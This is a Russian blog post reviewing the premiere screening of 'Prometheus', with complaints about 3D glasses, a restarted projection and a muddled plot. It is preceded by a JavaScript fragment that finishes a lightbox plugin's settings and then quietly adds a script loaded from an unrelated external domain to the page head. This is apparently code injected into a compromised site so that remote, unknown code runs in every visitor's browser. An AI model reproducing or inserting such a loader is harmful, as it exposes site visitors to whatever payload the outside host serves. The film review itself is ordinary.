, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вчера посетили премьеру фильма «Прометей». Для нас это был самый ожидаемый фильм года. Ещё бы: Ридли Скотт, мир Чужих, оригинальная научная фантастика и прочее. На премьере было удивительно мало людей. Из «звёзд» был только Укупник. А в основном молодёжь и странные бабки-тётки. Мало людей — больше халявы, раз уж попал на премьере, то грех её не урвать. Для крепости духа и ясности мысли мы выпили по четыре бокала шампанского, вполне недурного вкуса, и пошли занимать места, тем более, что они были прописаны в приглашении. Обычно места не указывают и могут согнать на ступеньки в проход.

Фильм начался и все превратились в мартышек с очками. Без очков смотришь на экран — всё расплывается как надо, всё-таки 3D. И в очках смотришь — тоже всё расплывается. И так снимешь, наденешь, снимешь, наденешь и поймёшь, что это очень мало напоминает премьеру, потому что на экран смысла смотреть нет, а там уже что-то интересное показывают. И только после того, как зал завыл, засвистел и застучал лапами, фильм перезапустили заново уже как полагается.

Впечатления от фильма двоякие. С одной стороны, мы получили ответы на многие вопросы, связанные с Космическими Жокеями, а с другой — навалило очень много новых, на которые можно найти разные ответы и непонятно, какие из них ближе к правде. Как будто за красивой формой забыли о цельности сюжета. И насколько хорош мир, настолько невнятна рассказанная история.

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.